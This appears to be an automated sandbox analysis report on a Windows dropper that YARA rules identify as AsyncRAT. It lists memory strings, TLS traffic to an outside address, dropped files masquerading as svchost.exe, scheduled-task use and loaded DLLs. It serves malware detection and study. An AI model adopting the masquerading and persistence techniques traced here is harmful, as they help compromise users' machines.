                      Source: svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfrf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf%S
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3875203578.000002A0E1E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                      Source: svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srfe
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                      Source: svchost.exe, 00000013.00000002.3877050228.000002A0E1EE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878483640.000002A0E2E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                      Source: svchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfr
                      Source: svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                      Source: svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                      Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49705 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49784 version: TLS 1.2

                      System Summary

                      Source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\X.exe Code function: 2_2_00007FF8880D7352 2_2_00007FF8880D7352
                      Source: C:\Users\user\AppData\Roaming\X.exe Code function: 2_2_00007FF8880D65A6 2_2_00007FF8880D65A6
                      Source: C:\Users\user\AppData\Roaming\X.exe Code function: 2_2_00007FF8880D0E89 2_2_00007FF8880D0E89
                      Source: C:\Users\user\AppData\Roaming\X.exe Code function: 2_2_00007FF8880D17F5 2_2_00007FF8880D17F5
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000000.1412513550.0000000000A2A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameR6 script.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameX.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe Binary or memory string: OriginalFilenameR6 script.exe4 vs SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
